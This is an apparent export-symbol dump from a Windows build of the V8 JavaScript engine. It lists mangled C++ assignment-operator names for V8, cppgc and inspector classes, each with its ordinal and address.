                                                                                                                                                                                                        ??4NodeProperties@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20770x140078ac0
                                                                                                                                                                                                        ??4NormalPageMemoryPool@internal@cppgc@@QEAAAEAV012@AEBV012@@Z20780x140450e40
                                                                                                                                                                                                        ??4Number@v8@@QEAAAEAV01@$$QEAV01@@Z20790x140078ac0
                                                                                                                                                                                                        ??4Number@v8@@QEAAAEAV01@AEBV01@@Z20800x140078ac0
                                                                                                                                                                                                        ??4NumberObject@v8@@QEAAAEAV01@$$QEAV01@@Z20810x140078ac0
                                                                                                                                                                                                        ??4NumberObject@v8@@QEAAAEAV01@AEBV01@@Z20820x140078ac0
                                                                                                                                                                                                        ??4OSROptimizedCodeCache@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20830x140078b00
                                                                                                                                                                                                        ??4OSROptimizedCodeCache@internal@v8@@QEAAAEAV012@AEBV012@@Z20840x140078b00
                                                                                                                                                                                                        ??4Object@v8@@QEAAAEAV01@$$QEAV01@@Z20850x140078ac0
                                                                                                                                                                                                        ??4Object@v8@@QEAAAEAV01@AEBV01@@Z20860x140078ac0
                                                                                                                                                                                                        ??4ObjectAllocator@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z20870x140079920
                                                                                                                                                                                                        ??4ObjectAllocator@internal@cppgc@@QEAAAEAV012@AEBV012@@Z20880x140079900
                                                                                                                                                                                                        ??4ObjectHashSet@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20890x140078b00
                                                                                                                                                                                                        ??4ObjectHashSet@internal@v8@@QEAAAEAV012@AEBV012@@Z20900x140078b00
                                                                                                                                                                                                        ??4ObjectHashTable@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20910x140078b00
                                                                                                                                                                                                        ??4ObjectHashTable@internal@v8@@QEAAAEAV012@AEBV012@@Z20920x140078b00
                                                                                                                                                                                                        ??4ObjectIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z20930x140078ac0
                                                                                                                                                                                                        ??4ObjectRef@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z20940x140079770
                                                                                                                                                                                                        ??4ObjectRef@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z20950x140079760
                                                                                                                                                                                                        ??4ObjectTemplate@v8@@QEAAAEAV01@$$QEAV01@@Z20960x140078ac0
                                                                                                                                                                                                        ??4ObjectTemplate@v8@@QEAAAEAV01@AEBV01@@Z20970x140078ac0
                                                                                                                                                                                                        ??4Operand@internal@v8@@QEAAAEAV012@AEBV012@@Z20980x140079fe0
                                                                                                                                                                                                        ??4OrderedHashMap@internal@v8@@QEAAAEAV012@$$QEAV012@@Z20990x140078b00
                                                                                                                                                                                                        ??4OrderedHashMap@internal@v8@@QEAAAEAV012@AEBV012@@Z21000x140078b00
                                                                                                                                                                                                        ??4OrderedHashMapHandler@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21010x140078ac0
                                                                                                                                                                                                        ??4OrderedHashMapHandler@internal@v8@@QEAAAEAV012@AEBV012@@Z21020x140078ac0
                                                                                                                                                                                                        ??4OrderedHashSet@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21030x140078b00
                                                                                                                                                                                                        ??4OrderedHashSet@internal@v8@@QEAAAEAV012@AEBV012@@Z21040x140078b00
                                                                                                                                                                                                        ??4OrderedHashSetHandler@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21050x140078ac0
                                                                                                                                                                                                        ??4OrderedHashSetHandler@internal@v8@@QEAAAEAV012@AEBV012@@Z21060x140078ac0
                                                                                                                                                                                                        ??4OrderedNameDictionary@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21070x140078b00
                                                                                                                                                                                                        ??4OrderedNameDictionary@internal@v8@@QEAAAEAV012@AEBV012@@Z21080x140078b00
                                                                                                                                                                                                        ??4OrderedNameDictionaryHandler@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21090x140078ac0
                                                                                                                                                                                                        ??4OrderedNameDictionaryHandler@internal@v8@@QEAAAEAV012@AEBV012@@Z21100x140078ac0
                                                                                                                                                                                                        ??4OutputStream@v8@@QEAAAEAV01@AEBV01@@Z21110x140078ac0
                                                                                                                                                                                                        ??4PageMemory@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z21120x140450eb0
                                                                                                                                                                                                        ??4PageMemory@internal@cppgc@@QEAAAEAV012@AEBV012@@Z21130x140079a50
                                                                                                                                                                                                        ??4PageMemoryRegionTree@internal@cppgc@@QEAAAEAV012@AEBV012@@Z21140x140450ed0
                                                                                                                                                                                                        ??4PagedSpaceIterator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21150x140079d90
                                                                                                                                                                                                        ??4PagedSpaceIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z21160x140079760
                                                                                                                                                                                                        ??4PagedSpaceObjectIterator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21170x14047f140
                                                                                                                                                                                                        ??4PagedSpaceObjectIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z21180x14047f140
                                                                                                                                                                                                        ??4PeeledIteration@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z21190x140078ac0
                                                                                                                                                                                                        ??4PeeledIteration@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z21200x140078ac0
                                                                                                                                                                                                        ??4PersistentHandleVisitor@v8@@QEAAAEAV01@AEBV01@@Z21210x140078ac0
                                                                                                                                                                                                        ??4PersistentRegionLock@internal@cppgc@@QEAAAEAV012@AEBV012@@Z21220x140078ac0
                                                                                                                                                                                                        ??4Platform@cppgc@@QEAAAEAV01@AEBV01@@Z21230x140078ac0
                                                                                                                                                                                                        ??4PreFinalizerRegistrationDispatcher@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z21240x140078ac0
                                                                                                                                                                                                        ??4PreFinalizerRegistrationDispatcher@internal@cppgc@@QEAAAEAV012@AEBV012@@Z21250x140078ac0
                                                                                                                                                                                                        ??4Primitive@v8@@QEAAAEAV01@$$QEAV01@@Z21260x140078ac0
                                                                                                                                                                                                        ??4Primitive@v8@@QEAAAEAV01@AEBV01@@Z21270x140078ac0
                                                                                                                                                                                                        ??4PrimitiveArray@v8@@QEAAAEAV01@$$QEAV01@@Z21280x140078ac0
                                                                                                                                                                                                        ??4PrimitiveArray@v8@@QEAAAEAV01@AEBV01@@Z21290x140078ac0
                                                                                                                                                                                                        ??4Private@v8@@QEAAAEAV01@$$QEAV01@@Z21300x140078ac0
                                                                                                                                                                                                        ??4Private@v8@@QEAAAEAV01@AEBV01@@Z21310x140078ac0
                                                                                                                                                                                                        ??4ProcessHeapStatistics@cppgc@@QEAAAEAV01@$$QEAV01@@Z21320x140078ac0
                                                                                                                                                                                                        ??4ProcessHeapStatistics@cppgc@@QEAAAEAV01@AEBV01@@Z21330x140078ac0
                                                                                                                                                                                                        ??4Promise@v8@@QEAAAEAV01@$$QEAV01@@Z21340x140078ac0
                                                                                                                                                                                                        ??4Promise@v8@@QEAAAEAV01@AEBV01@@Z21350x140078ac0
                                                                                                                                                                                                        ??4PropertyIterator@debug@v8@@QEAAAEAV012@AEBV012@@Z21360x140078ac0
                                                                                                                                                                                                        ??4Proxy@v8@@QEAAAEAV01@$$QEAV01@@Z21370x140078ac0
                                                                                                                                                                                                        ??4Proxy@v8@@QEAAAEAV01@AEBV01@@Z21380x140078ac0
                                                                                                                                                                                                        ??4RandomNumberGenerator@base@v8@@QEAAAEAV012@$$QEAV012@@Z21390x140079920
                                                                                                                                                                                                        ??4RandomNumberGenerator@base@v8@@QEAAAEAV012@AEBV012@@Z21400x140079900
                                                                                                                                                                                                        ??4Recorder@metrics@v8@@QEAAAEAV012@AEBV012@@Z21410x140078ac0
                                                                                                                                                                                                        ??4Reducer@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z21420x140078ac0
                                                                                                                                                                                                        ??4RegExp@v8@@QEAAAEAV01@$$QEAV01@@Z21430x140078ac0
                                                                                                                                                                                                        ??4RegExp@v8@@QEAAAEAV01@AEBV01@@Z21440x140078ac0
                                                                                                                                                                                                        ??4RegExpParser@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21450x140716f50
                                                                                                                                                                                                        ??4RegExpParser@internal@v8@@QEAAAEAV012@AEBV012@@Z21460x140716fe0
                                                                                                                                                                                                        ??4Register@interpreter@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z21470x14047f170
                                                                                                                                                                                                        ??4Register@interpreter@internal@v8@@QEAAAEAV0123@AEBV0123@@Z21480x14047f170
                                                                                                                                                                                                        ??4RegisterState@v8@@QEAAAEAU01@AEBU01@@Z21490x140b07930
                                                                                                                                                                                                        ??4RemoteObject@API@Runtime@protocol@v8_inspector@@QEAAAEAV01234@$$QEAV01234@@Z21500x140078ac0
                                                                                                                                                                                                        ??4RemoteObject@API@Runtime@protocol@v8_inspector@@QEAAAEAV01234@AEBV01234@@Z21510x140078ac0
                                                                                                                                                                                                        ??4RepresentationChanger@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z21520x14106c7b0
                                                                                                                                                                                                        ??4RepresentationChanger@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z21530x140079a50
                                                                                                                                                                                                        ??4Resolver@Promise@v8@@QEAAAEAV012@$$QEAV012@@Z21540x140078ac0
                                                                                                                                                                                                        ??4Resolver@Promise@v8@@QEAAAEAV012@AEBV012@@Z21550x140078ac0
                                                                                                                                                                                                        ??4ResourceConstraints@v8@@QEAAAEAV01@$$QEAV01@@Z21560x1400798b0
                                                                                                                                                                                                        ??4ResourceConstraints@v8@@QEAAAEAV01@AEBV01@@Z21570x140079890
                                                                                                                                                                                                        ??4ResumeJumpTarget@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z21580x14007a000
                                                                                                                                                                                                        ??4ResumeJumpTarget@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z21590x140079fe0
                                                                                                                                                                                                        ??4ScannerStream@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21600x140078ac0
                                                                                                                                                                                                        ??4ScannerStream@internal@v8@@QEAAAEAV012@AEBV012@@Z21610x140078ac0
                                                                                                                                                                                                        ??4ScheduleVerifier@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z21620x140078ac0
                                                                                                                                                                                                        ??4ScheduleVerifier@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z21630x140078ac0
                                                                                                                                                                                                        ??4Script@debug@v8@@QEAAAEAV012@$$QEAV012@@Z21640x140078ac0
                                                                                                                                                                                                        ??4Script@debug@v8@@QEAAAEAV012@AEBV012@@Z21650x140078ac0
                                                                                                                                                                                                        ??4Script@v8@@QEAAAEAV01@$$QEAV01@@Z21660x140078ac0
                                                                                                                                                                                                        ??4Script@v8@@QEAAAEAV01@AEBV01@@Z21670x140078ac0
                                                                                                                                                                                                        ??4ScriptCompiler@v8@@QEAAAEAV01@$$QEAV01@@Z21680x140078ac0
                                                                                                                                                                                                        ??4ScriptCompiler@v8@@QEAAAEAV01@AEBV01@@Z21690x140078ac0
                                                                                                                                                                                                        ??4ScriptData@Coverage@debug@v8@@QEAAAEAV0123@$$QEAV0123@@Z21700x14047e5f0
                                                                                                                                                                                                        ??4ScriptData@TypeProfile@debug@v8@@QEAAAEAV0123@$$QEAV0123@@Z21710x14047e5f0
                                                                                                                                                                                                        ??4ScriptOrModule@v8@@QEAAAEAV01@$$QEAV01@@Z21720x140078ac0
                                                                                                                                                                                                        ??4ScriptOrModule@v8@@QEAAAEAV01@AEBV01@@Z21730x140078ac0
                                                                                                                                                                                                        ??4ScriptStreamingTask@ScriptCompiler@v8@@QEAAAEAV012@$$QEAV012@@Z21740x140078b00
                                                                                                                                                                                                        ??4ScriptStreamingTask@ScriptCompiler@v8@@QEAAAEAV012@AEBV012@@Z21750x140078b00
                                                                                                                                                                                                        ??4SearchMatch@API@Debugger@protocol@v8_inspector@@QEAAAEAV01234@$$QEAV01234@@Z21760x140078ac0
                                                                                                                                                                                                        ??4SearchMatch@API@Debugger@protocol@v8_inspector@@QEAAAEAV01234@AEBV01234@@Z21770x140078ac0
                                                                                                                                                                                                        ??4Set@v8@@QEAAAEAV01@$$QEAV01@@Z21780x140078ac0
                                                                                                                                                                                                        ??4Set@v8@@QEAAAEAV01@AEBV01@@Z21790x140078ac0
                                                                                                                                                                                                        ??4SharedArrayBuffer@v8@@QEAAAEAV01@$$QEAV01@@Z21800x140078ac0
                                                                                                                                                                                                        ??4SharedArrayBuffer@v8@@QEAAAEAV01@AEBV01@@Z21810x140078ac0
                                                                                                                                                                                                        ??4SharedFunctionInfoRef@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z21820x140079760
                                                                                                                                                                                                        ??4SharedFunctionInfoRef@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z21830x140079760
                                                                                                                                                                                                        ??4SharedMemoryStatistics@v8@@QEAAAEAV01@$$QEAV01@@Z21840x140079920
                                                                                                                                                                                                        ??4SharedMemoryStatistics@v8@@QEAAAEAV01@AEBV01@@Z21850x140079900
                                                                                                                                                                                                        ??4Signature@v8@@QEAAAEAV01@$$QEAV01@@Z21860x140078ac0
                                                                                                                                                                                                        ??4Signature@v8@@QEAAAEAV01@AEBV01@@Z21870x140078ac0
                                                                                                                                                                                                        ??4SignatureMap@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z21880x14047f180
                                                                                                                                                                                                        ??4SimdShuffle@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z21890x140078ac0
                                                                                                                                                                                                        ??4SimdShuffle@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z21900x140078ac0
                                                                                                                                                                                                        ??4SimdSwizzle@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z21910x140078ac0
                                                                                                                                                                                                        ??4SimdSwizzle@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z21920x140078ac0
                                                                                                                                                                                                        ??4SourceIdAssigner@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z21930x140eeb6d0
                                                                                                                                                                                                        ??4SourceIdAssigner@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z21940x140eeb7f0
                                                                                                                                                                                                        ??4SourceLocation@cppgc@@QEAAAEAV01@$$QEAV01@@Z21950x140079920
                                                                                                                                                                                                        ??4SourceLocation@cppgc@@QEAAAEAV01@AEBV01@@Z21960x140079900
                                                                                                                                                                                                        ??4SourcePositionTableBuilder@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21970x14047f2c0
                                                                                                                                                                                                        ??4SourcePositionTableBuilder@internal@v8@@QEAAAEAV012@AEBV012@@Z21980x14047f410
                                                                                                                                                                                                        ??4SourcePositionTableIterator@internal@v8@@QEAAAEAV012@$$QEAV012@@Z21990x14047f520
                                                                                                                                                                                                        ??4SourcePositionTableIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z22000x14047f560
                                                                                                                                                                                                        ??4SpaceIterator@internal@v8@@QEAAAEAV012@AEBV012@@Z22010x14047f590
                                                                                                                                                                                                        ??4Stack@base@heap@@QEAAAEAV012@$$QEAV012@@Z22020x140078b00
                                                                                                                                                                                                        ??4Stack@base@heap@@QEAAAEAV012@AEBV012@@Z22030x140078b00
                                                                                                                                                                                                        ??4Stack@base@v8@@QEAAAEAV012@$$QEAV012@@Z22040x140078ac0
                                                                                                                                                                                                        ??4Stack@base@v8@@QEAAAEAV012@AEBV012@@Z22050x140078ac0
                                                                                                                                                                                                        ??4StackFrame@v8@@QEAAAEAV01@$$QEAV01@@Z22060x140078ac0
                                                                                                                                                                                                        ??4StackFrame@v8@@QEAAAEAV01@AEBV01@@Z22070x140078ac0
                                                                                                                                                                                                        ??4StackTrace@API@Runtime@protocol@v8_inspector@@QEAAAEAV01234@$$QEAV01234@@Z22080x140078ac0
                                                                                                                                                                                                        ??4StackTrace@API@Runtime@protocol@v8_inspector@@QEAAAEAV01234@AEBV01234@@Z22090x140078ac0
                                                                                                                                                                                                        ??4StackTrace@debug@base@v8@@QEAAAEAV0123@AEBV0123@@Z22100x140e5ec10
                                                                                                                                                                                                        ??4StackTrace@v8@@QEAAAEAV01@$$QEAV01@@Z22110x140078ac0
                                                                                                                                                                                                        ??4StackTrace@v8@@QEAAAEAV01@AEBV01@@Z22120x140078ac0
                                                                                                                                                                                                        ??4StackTraceId@API@Runtime@protocol@v8_inspector@@QEAAAEAV01234@$$QEAV01234@@Z22130x140078ac0
                                                                                                                                                                                                        ??4StackTraceId@API@Runtime@protocol@v8_inspector@@QEAAAEAV01234@AEBV01234@@Z22140x140078ac0
                                                                                                                                                                                                        ??4StartupData@v8@@QEAAAEAV01@$$QEAV01@@Z22150x140079d90
                                                                                                                                                                                                        ??4StartupData@v8@@QEAAAEAV01@AEBV01@@Z22160x140079760
                                                                                                                                                                                                        ??4StateValuesAccess@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z22170x140078b00
                                                                                                                                                                                                        ??4StateValuesAccess@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z22180x140078b00
                                                                                                                                                                                                        ??4StreamingDecoder@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z22190x140544400
                                                                                                                                                                                                        ??4StreamingProcessor@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z22200x140078ac0
                                                                                                                                                                                                        ??4String@v8@@QEAAAEAV01@$$QEAV01@@Z22210x140078ac0
                                                                                                                                                                                                        ??4String@v8@@QEAAAEAV01@AEBV01@@Z22220x140078ac0
                                                                                                                                                                                                        ??4StringBuffer@v8_inspector@@QEAAAEAV01@AEBV01@@Z22230x140078ac0
                                                                                                                                                                                                        ??4StringHasher@internal@v8@@QEAAAEAV012@$$QEAV012@@Z22240x140078ac0
                                                                                                                                                                                                        ??4StringHasher@internal@v8@@QEAAAEAV012@AEBV012@@Z22250x140078ac0
                                                                                                                                                                                                        ??4StringObject@v8@@QEAAAEAV01@$$QEAV01@@Z22260x140078ac0
                                                                                                                                                                                                        ??4StringObject@v8@@QEAAAEAV01@AEBV01@@Z22270x140078ac0
                                                                                                                                                                                                        ??4StringView@v8_inspector@@QEAAAEAV01@$$QEAV01@@Z22280x14042e050
                                                                                                                                                                                                        ??4StringView@v8_inspector@@QEAAAEAV01@AEBV01@@Z22290x140079900
                                                                                                                                                                                                        ??4SwissNameDictionary@internal@v8@@QEAAAEAV012@$$QEAV012@@Z22300x140078b00
                                                                                                                                                                                                        ??4SwissNameDictionary@internal@v8@@QEAAAEAV012@AEBV012@@Z22310x140078b00
                                                                                                                                                                                                        ??4Symbol@v8@@QEAAAEAV01@$$QEAV01@@Z22320x140078ac0
                                                                                                                                                                                                        ??4Symbol@v8@@QEAAAEAV01@AEBV01@@Z22330x140078ac0
                                                                                                                                                                                                        ??4SymbolObject@v8@@QEAAAEAV01@$$QEAV01@@Z22340x140078ac0
                                                                                                                                                                                                        ??4SymbolObject@v8@@QEAAAEAV01@AEBV01@@Z22350x140078ac0
                                                                                                                                                                                                        ??4SysInfo@base@v8@@QEAAAEAV012@$$QEAV012@@Z22360x140078ac0
                                                                                                                                                                                                        ??4SysInfo@base@v8@@QEAAAEAV012@AEBV012@@Z22370x140078ac0
                                                                                                                                                                                                        ??4Template@v8@@QEAAAEAV01@$$QEAV01@@Z22380x140078ac0
                                                                                                                                                                                                        ??4Template@v8@@QEAAAEAV01@AEBV01@@Z22390x140078ac0
                                                                                                                                                                                                        ??4ThreadTicks@base@v8@@QEAAAEAV012@$$QEAV012@@Z22400x140078b00
                                                                                                                                                                                                        ??4ThreadTicks@base@v8@@QEAAAEAV012@AEBV012@@Z22410x140078b00
                                                                                                                                                                                                        ??4TickSample@internal@v8@@QEAAAEAU012@$$QEAU012@@Z22420x140745140
                                                                                                                                                                                                        ??4TickSample@internal@v8@@QEAAAEAU012@AEBU012@@Z22430x1407451f0
                                                                                                                                                                                                        ??4Time@base@v8@@QEAAAEAV012@$$QEAV012@@Z22440x140078b00
                                                                                                                                                                                                        ??4Time@base@v8@@QEAAAEAV012@AEBV012@@Z22450x140078b00
                                                                                                                                                                                                        ??4TimeDelta@base@v8@@QEAAAEAV012@$$QEAV012@@Z22460x140078b00
                                                                                                                                                                                                        ??4TimeDelta@base@v8@@QEAAAEAV012@AEBV012@@Z22470x140078b00
                                                                                                                                                                                                        ??4TimeTicks@base@v8@@QEAAAEAV012@$$QEAV012@@Z22480x140078b00
                                                                                                                                                                                                        ??4TimeTicks@base@v8@@QEAAAEAV012@AEBV012@@Z22490x140078b00
                                                                                                                                                                                                        ??4Token@internal@v8@@QEAAAEAV012@$$QEAV012@@Z22500x140078ac0
                                                                                                                                                                                                        ??4Token@internal@v8@@QEAAAEAV012@AEBV012@@Z22510x140078ac0
                                                                                                                                                                                                        ??4TraceTraitFromInnerAddressImpl@internal@cppgc@@QEAAAEAU012@$$QEAU012@@Z22520x140078ac0
                                                                                                                                                                                                        ??4TraceTraitFromInnerAddressImpl@internal@cppgc@@QEAAAEAU012@AEBU012@@Z22530x140078ac0
                                                                                                                                                                                                        ??4TracedGlobalHandleVisitor@EmbedderHeapTracer@v8@@QEAAAEAV012@AEBV012@@Z22540x140078ac0
                                                                                                                                                                                                        ??4Type@compiler@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z22550x140078b00
                                                                                                                                                                                                        ??4Type@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z22560x140078b00
                                                                                                                                                                                                        ??4TypeProfile@debug@v8@@QEAAAEAV012@$$QEAV012@@Z22570x14047e8f0
                                                                                                                                                                                                        ??4TypedArray@v8@@QEAAAEAV01@$$QEAV01@@Z22580x140078ac0
                                                                                                                                                                                                        ??4TypedArray@v8@@QEAAAEAV01@AEBV01@@Z22590x140078ac0
                                                                                                                                                                                                        ??4TypedSlotSet@internal@v8@@QEAAAEAV012@$$QEAV012@@Z22600x14047f5b0
                                                                                                                                                                                                        ??4TypedSlotSet@internal@v8@@QEAAAEAV012@AEBV012@@Z22610x14047f5b0
                                                                                                                                                                                                        ??4TypedSlots@internal@v8@@QEAAAEAV012@AEBV012@@Z22620x14047f5d0
                                                                                                                                                                                                        ??4Uint16Array@v8@@QEAAAEAV01@$$QEAV01@@Z22630x140078ac0
                                                                                                                                                                                                        ??4Uint16Array@v8@@QEAAAEAV01@AEBV01@@Z22640x140078ac0
                                                                                                                                                                                                        ??4Uint32@v8@@QEAAAEAV01@$$QEAV01@@Z22650x140078ac0
                                                                                                                                                                                                        ??4Uint32@v8@@QEAAAEAV01@AEBV01@@Z22660x140078ac0
                                                                                                                                                                                                        ??4Uint32Array@v8@@QEAAAEAV01@$$QEAV01@@Z22670x140078ac0
                                                                                                                                                                                                        ??4Uint32Array@v8@@QEAAAEAV01@AEBV01@@Z22680x140078ac0
                                                                                                                                                                                                        ??4Uint8Array@v8@@QEAAAEAV01@$$QEAV01@@Z22690x140078ac0
                                                                                                                                                                                                        ??4Uint8Array@v8@@QEAAAEAV01@AEBV01@@Z22700x140078ac0
                                                                                                                                                                                                        ??4Uint8ClampedArray@v8@@QEAAAEAV01@$$QEAV01@@Z22710x140078ac0
                                                                                                                                                                                                        ??4Uint8ClampedArray@v8@@QEAAAEAV01@AEBV01@@Z22720x140078ac0
                                                                                                                                                                                                        ??4UnboundModuleScript@v8@@QEAAAEAV01@$$QEAV01@@Z22730x140078ac0
                                                                                                                                                                                                        ??4UnboundModuleScript@v8@@QEAAAEAV01@AEBV01@@Z22740x140078ac0
                                                                                                                                                                                                        ??4UnboundScript@v8@@QEAAAEAV01@$$QEAV01@@Z22750x140078ac0
                                                                                                                                                                                                        ??4UnboundScript@v8@@QEAAAEAV01@AEBV01@@Z22760x140078ac0
                                                                                                                                                                                                        ??4Unlocker@v8@@QEAAAEAV01@AEBV01@@Z22770x140078b00
                                                                                                                                                                                                        ??4UnoptimizedCompileFlags@internal@v8@@QEAAAEAV012@$$QEAV012@@Z22780x14047f5f0
                                                                                                                                                                                                        ??4UnoptimizedCompileFlags@internal@v8@@QEAAAEAV012@AEBV012@@Z22790x140079fe0
                                                                                                                                                                                                        ??4Unwinder@v8@@QEAAAEAV01@$$QEAV01@@Z22800x140078ac0
                                                                                                                                                                                                        ??4Unwinder@v8@@QEAAAEAV01@AEBV01@@Z22810x140078ac0
                                                                                                                                                                                                        ??4Uses@Node@compiler@internal@v8@@QEAAAEAV01234@$$QEAV01234@@Z22820x140078b00
                                                                                                                                                                                                        ??4Uses@Node@compiler@internal@v8@@QEAAAEAV01234@AEBV01234@@Z22830x140078b00
                                                                                                                                                                                                        ??4Utf8@unibrow@@QEAAAEAV01@$$QEAV01@@Z22840x140078ac0
                                                                                                                                                                                                        ??4Utf8@unibrow@@QEAAAEAV01@AEBV01@@Z22850x140078ac0
                                                                                                                                                                                                        ??4Utf8Decoder@internal@v8@@QEAAAEAV012@$$QEAV012@@Z22860x14047f610
                                                                                                                                                                                                        ??4Utf8Decoder@internal@v8@@QEAAAEAV012@AEBV012@@Z22870x140079fe0
                                                                                                                                                                                                        ??4V8@v8@@QEAAAEAV01@$$QEAV01@@Z22880x140078ac0
                                                                                                                                                                                                        ??4V8@v8@@QEAAAEAV01@AEBV01@@Z22890x140078ac0
                                                                                                                                                                                                        ??4V8Inspector@v8_inspector@@QEAAAEAV01@AEBV01@@Z22900x140078ac0
                                                                                                                                                                                                        ??4V8InspectorClient@v8_inspector@@QEAAAEAV01@AEBV01@@Z22910x140078ac0
                                                                                                                                                                                                        ??4V8InspectorSession@v8_inspector@@QEAAAEAV01@AEBV01@@Z22920x140078ac0
                                                                                                                                                                                                        ??4V8StackTrace@v8_inspector@@QEAAAEAV01@AEBV01@@Z22930x140078ac0
                                                                                                                                                                                                        ??4V8StackTraceId@v8_inspector@@QEAAAEAU01@$$QEAU01@@Z22940x14042e080
                                                                                                                                                                                                        ??4V8StackTraceId@v8_inspector@@QEAAAEAU01@AEBU01@@Z22950x14042e080
                                                                                                                                                                                                        ??4Value@v8@@QEAAAEAV01@$$QEAV01@@Z22960x140078ac0
                                                                                                                                                                                                        ??4Value@v8@@QEAAAEAV01@AEBV01@@Z22970x140078ac0
                                                                                                                                                                                                        ??4ValueNumberingReducer@compiler@internal@v8@@QEAAAEAV0123@AEBV0123@@Z22980x140f0c220
                                                                                                                                                                                                        ??4Version@internal@v8@@QEAAAEAV012@$$QEAV012@@Z22990x140078ac0
                                                                                                                                                                                                        ??4Version@internal@v8@@QEAAAEAV012@AEBV012@@Z23000x140078ac0
                                                                                                                                                                                                        ??4VirtualMemory@internal@cppgc@@QEAAAEAV012@$$QEAV012@@Z23010x140451460
                                                                                                                                                                                                        ??4Visitor@cppgc@@QEAAAEAV01@AEBV01@@Z23020x140078ac0
                                                                                                                                                                                                        ??4VoidDescriptor@internal@v8@@QEAAAEAV012@$$QEAV012@@Z23030x140078b00
                                                                                                                                                                                                        ??4VoidDescriptor@internal@v8@@QEAAAEAV012@AEBV012@@Z23040x140078b00
                                                                                                                                                                                                        ??4WasmCompilationUnit@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z23050x140528160
                                                                                                                                                                                                        ??4WasmCompilationUnit@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z23060x140078b00
                                                                                                                                                                                                        ??4WasmDebugSymbols@wasm@internal@v8@@QEAAAEAU0123@$$QEAU0123@@Z23070x14047f630
                                                                                                                                                                                                        ??4WasmDebugSymbols@wasm@internal@v8@@QEAAAEAU0123@AEBU0123@@Z23080x140079fe0
                                                                                                                                                                                                        ??4WasmError@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z23090x140528180
                                                                                                                                                                                                        ??4WasmError@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z23100x1405281b0
                                                                                                                                                                                                        ??4WasmExceptionPackage@internal@v8@@QEAAAEAV012@$$QEAV012@@Z23110x140078b00
                                                                                                                                                                                                        ??4WasmExceptionPackage@internal@v8@@QEAAAEAV012@AEBV012@@Z23120x140078b00
                                                                                                                                                                                                        ??4WasmFunctionBuilder@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z23130x14053e810
                                                                                                                                                                                                        ??4WasmFunctionBuilder@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z23140x14053ea30
                                                                                                                                                                                                        ??4WasmInstanceObject@internal@v8@@QEAAAEAV012@$$QEAV012@@Z23150x140078b00
                                                                                                                                                                                                        ??4WasmInstanceObject@internal@v8@@QEAAAEAV012@AEBV012@@Z23160x140078b00
                                                                                                                                                                                                        ??4WasmMemoryObject@v8@@QEAAAEAV01@$$QEAV01@@Z23170x140078ac0
                                                                                                                                                                                                        ??4WasmMemoryObject@v8@@QEAAAEAV01@AEBV01@@Z23180x140078ac0
                                                                                                                                                                                                        ??4WasmModuleObject@v8@@QEAAAEAV01@$$QEAV01@@Z23190x140078ac0
                                                                                                                                                                                                        ??4WasmModuleObject@v8@@QEAAAEAV01@AEBV01@@Z23200x140078ac0
                                                                                                                                                                                                        ??4WasmModuleObjectBuilderStreaming@v8@@AEAAAEAV01@$$QEAV01@@Z23210x140079620
                                                                                                                                                                                                        ??4WasmModuleSourceMap@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z23220x14047f640
                                                                                                                                                                                                        ??4WasmModuleSourceMap@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z23230x14047f6e0
                                                                                                                                                                                                        ??4WasmOpcodes@wasm@internal@v8@@QEAAAEAV0123@$$QEAV0123@@Z23240x140078ac0
                                                                                                                                                                                                        ??4WasmOpcodes@wasm@internal@v8@@QEAAAEAV0123@AEBV0123@@Z23250x140078ac0
